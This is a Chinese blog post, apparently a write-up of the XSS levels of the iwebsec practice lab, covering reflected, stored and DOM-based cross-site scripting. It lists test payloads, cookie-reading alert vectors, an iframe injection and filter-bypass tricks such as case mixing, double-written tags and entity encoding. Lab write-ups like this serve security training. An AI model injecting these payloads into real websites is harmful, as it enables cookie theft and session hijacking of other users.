web综合靶场【iwebsec】--XSS漏洞

最新推荐文章于 2024-01-22 22:46:55 发布
最新推荐文章于 2024-01-22 22:46:55 发布
阅读量579 收藏 10
点赞数 2
分类专栏: ctf练习记录 Web漏洞 XSS漏洞 文章标签: xss web安全 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56664029/article/details/129810775
版权

01-反射型XSS漏洞
在这里插入图片描述
下面给了提示:/01.php?name=iwebsec
随便输入一个nihao看看
在这里插入图片描述
反射型特点,输入什么输出什么
接下来用js代码测试,看看有没有xss漏洞

<script>alert(123)</script>

拿cookie
<script>alert(document.cookie)</script>

看图,这个弹窗并没有什么实际的意义,但通过它我们知道输入javascript代码是可以被执行的,当我们输入一些其他函数,比如document.cookie就可以成功盗取用户的cookie信息
在这里插入图片描述
拿到cookie值
在这里插入图片描述
补充一个好玩的
通过<iframe src="http://www.7k7k.com/" width="200" height="400">#document</iframe>可以将7k7k小游戏回显出来
在这里插入图片描述
补充重用语句

常用语句:
<script>alert(123)</script> 
<iframe src="http://www.7k7k.com/" width="200" height="400">#document</iframe>
<script> alert(document.cookie) </script>

<img src=x onerror=alert(1)> 
<svg onload=alert(1)> 
<a href=javascript:alert(1)>
<script>alter('dreeee')</script>;

用于探测的万能语句:
<SCRscriptIPT>'"()Oonnjavascript

标签溢出:
"> <script>alert('dreeee')</script>;

当“<>”被转义时:
' οnmοuseοver='alert(/dreeee/)

构造伪链接:
"><a href=javascript:alert(/dreeee/)>别点我没结果</a>

大小写绕过:
"><a hREf=javascript:alert(/dreeee/)>别点我没结果</a>

双写绕过:
"><SCRSCRIPTIPT>alert(/xss/)</SCRSCRIPTIPT>

转码绕过:
javas&#99;r&#13ipt:alert(/dreeee/)
javas&#99;r&#13ipt:alert('http://')

02-存储型XSS漏洞
在这里插入图片描述
通过将恶意Js语句上传给服务器,当有其他用户查看时,恶意语句会被浏览器解析并执行

文本框中输入

<script>alert(123)</script>

在这里插入图片描述
同理输入<script> alert(document.cookie) </script>就能够拿到cookie
也同理输入<iframe src="http://www.7k7k.com/" width="200" height="400">#document</iframe>就能够回显7k7k小游戏
在这里插入图片描述
03-DOM XSS漏洞

<img src= onerror=alert(document.cookie)>

拿到cookie
在这里插入图片描述

Wrypot
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶场日记-存储型xss漏洞利用
Fengsheng96的博客
09-08 333
靶场环境 解题思路 通过阅读题目,已经了解到靶场留言板存在存储型XSS漏洞,flag在cookie里,存储型XSS(Stored XSS) 又称为持久型跨站点脚本,它一般发生在XSS攻击向量(一般指XSS攻击代码)存储在网站数据库,当一个页面被用户打开的时候执行。每当用户打开浏览器,脚本执行。持久的XSS相比非持久性XSS攻击危害性更大, 因为每当用户打开页面,查看内容时脚本将自动执行。所以我们只要通过一些在线的XSS平台获取管理员cookie,flag就在管理员cookie里就解决了。 登陆一个在线x
iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入
mooyuan的博客
11-25 2287
iwebsec靶场的SQL注入关卡共13关SQL注入漏洞,覆盖了数字型注入、字符型注入、报错型盲注、布尔型盲注、时间型盲注以及各种过滤绕过的注入,外加上二次注入,是SQL注入知识点覆盖较为全面的一个靶场。SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第一关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec的数字型关卡无过滤任何信息。
XSS漏洞 | iwebsec
weixin_52116519的博客
02-07 1186
攻击者在发帖的过程中,将恶意脚本连同正常信息一起注入帖子的内容中。客户端的脚本程序可以通过DOM动态修改页面内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOM型XSS漏洞不需要与服务器交互,它只发生在客户端处理数据阶段。这个跟反射型XSS很像,但是机制是不一样的,这里不需要用到后端,也就是不涉及php代码。将输入的东西提交后,展示在页面中,并且展示所有输入提交过的,这种就是存储型XSS了。是以前搭建好的,测了文件上传和一些SQL注入,现在好久没用了,重新启动。
iwebsec靶场XSS
果粒程
03-05 704
iwebsec靶场XSS
iwebsec XSS漏洞
最新发布
weixin_44135070的博客
01-22 359
【代码】iwebsec XSS漏洞
webug靶场xss
weixin_45705209的博客
08-26 435
反射型xss 首先观察了一下页面,并没有发现输入点,但是经过我敏锐的观察力发现url中id的值输出到了页面中,果不其然漏洞就在这,直接插入xss代码。
web安全xss攻击
weixin_30912051的博客
07-30 161
xss攻击的全称是Cross-Site Scripting (XSS)攻击,是一种注入式攻击。基本的做法是把恶意代码注入到目标网站。由于浏览器在打开目标网站的时候并不知道哪些脚本是恶意的,所以浏览器会无差别执行恶意脚本,从而导致用户信息和一些敏感信息被盗取和泄漏。 xss一般分为两种类型,持久化的xss和非持久化的xss。 持久化xss 下面这个例子演示了攻击者如何通过注入恶意代码去盗取用户...
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
10-18
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
利用Express模拟web安全之---xss的攻与防
01-26
XSS跨站脚本攻击】是Web应用中常见的安全漏洞之一,其全称为Cross Site Scripting。由于CSS(层叠样式表)的缩写相同,因此为了区分,将其缩写为XSS。攻击者利用XSS漏洞向网页中插入恶意的JavaScript代码,当用户...
web漏洞利用---XSS注入攻击
m0_65129142的博客
12-20 5426
XSS漏洞简介 XSS注入漏洞又称为"跨站脚本攻击(Cross Site Scripting)",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所以将跨站脚本攻击缩写为XSSXSS注入攻击的原理其实和SQL注入攻击的原理很相似,攻击者将恶意的Script代码插入到网页中,当正常用户浏览该页面时,被嵌入的恶意Script代码就会被执行,从而达到恶意攻击正常用户的目的。 XSS分类 跨站脚本注入漏洞是由于WEB服务器读取了用户可控数据输出到HTML页面的过程中没有进行安全处理
WebSec-xss
Starr
12-21 269
文章目录1. 关于xss1.1 分类1.2 和csrf区分一下1.3 措施1.3.1 编码1.3.2 过滤html实体CSP1.3.3 校正1.4 绕过2. 靶场练习2.1 pikachu反射型(GET)反射型(POST)存储型XSSDOM xssDOM xss-xxss盲打xss过滤htmlspecialcharsxss href输出xss js输出pkxss-盗取cookiepkxss-钓鱼pkxss-键盘记录 1. 关于xss cwe: https://cwe.mitre.org/data/defin
webug4.0靶场通关之XSS
0nc3的博客
06-24 786
0x00 反射型XSS 以进入页面就寻找搜索框,发现有个放大镜点着没有反应 但改URL中的id进行搜索 Payload: <script>(document.cookie)</script> 0x01 存储型XSS 下拉置底部留言板处 提交xss一句话留言 Payload: 0x02 Dom型XSS 看到搜索框,F12查看元素 搜索框的输入是给value参数传...
web靶场 ----- xss-labs
L0g1c的博客
07-24 404
既然上面的恶意代码被编码了,那么只能从属性值中的恶意代码处进行突破了。要想浏览器执行这里的弹窗代码,只需要将属性的引号和标签先闭合就可以了。服务器是将我们的恶意代码原封不动的返回了,浏览器才能成功弹窗。发现没有直接弹窗,这是因为onfocus事件的特殊性造成的。箭头5直接将进行敏感字符处理之后的变量值插入到。参数值中的恶意代码并没有被编码而是直接原样返回。在标签属性值中,浏览器是无法执行的。函数来破坏变量值中的敏感字符的语义。第二个参数是替换后,要成为的字符串。用于js弹窗的代码顺利执行了。........
测试开发必备技能:Web安全测试漏洞靶场实战
测试开发技术
03-10 430
关注上方“测试开发技术”,选择星标,干货技术,第一时间送达!安全在互联网行业,是一个对专业性较强,且敏感的一个领域,所谓"一念成佛,一念入魔",安全技术利用得当,可以为你的...
XSS十五关通关秘籍
Ms08067安全实验室
03-03 258
文章来源 | MS08067Web零基础1期作业本文作者:ymsli(Web零基础1期学员)第一关url输入关键字,完成第一关第二关文本框内输入" onclick=alert(123)>点击搜索,文本框已被添加onclick事件,点击文本框即可过关第三关输入测试字符<>"JavAScriPT'/:on;,说明文本框内容使用'闭合尝试使用第二关payload,"换成',语句最后需...
Web安全XSS漏洞详解
hack0919的博客
04-17 1564
常见的XSS漏洞危害有:cookie窃取,session劫持,钓鱼攻击,蠕虫,ddos等
Webug4.0靶场通关笔记(第五天)--------9-13
Yasso的博客
02-23 1292
一、反射型XSS 二、存储型XSS 三、万能密码登陆 四、DOM型xss 五、过滤xss 一、反射型XSS 跨站脚本(XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种,允许恶意用户将代码注入网页,这类攻击常包含HTML和用户端脚本语言。 这道题没有过滤。 经测试发现,标红的地方1是我们可以注入的点 我们测试发现,可以注入代码标签 <script>alert(123)</script> 我们获取一下cookie <script>.
iwebsec靶场 命令执行漏洞通关笔记
mooyuan的博客
11-25 3171
iwebsec靶场的命令执行通关笔记,共有五个关卡,分别涉及到基础的命令执行漏洞、空格绕过、关键字绕过、通配符绕过、base64绕过共五方面的渗透。什么是命令执行漏洞?命令执行漏洞是服务器端没有对客户端用户输入的参数进行过滤,导致用户可以通过任意拼接系统命令,使服务器端成功执行任意系统命令。命令执行漏洞主要是服务端没有对执行命令的函数做出过滤导致的,因为在web服务程序有时候去需要调用执行命令的函数,所以如果没有对客户端用户输入的命令进行过滤,可能发生命令执行漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值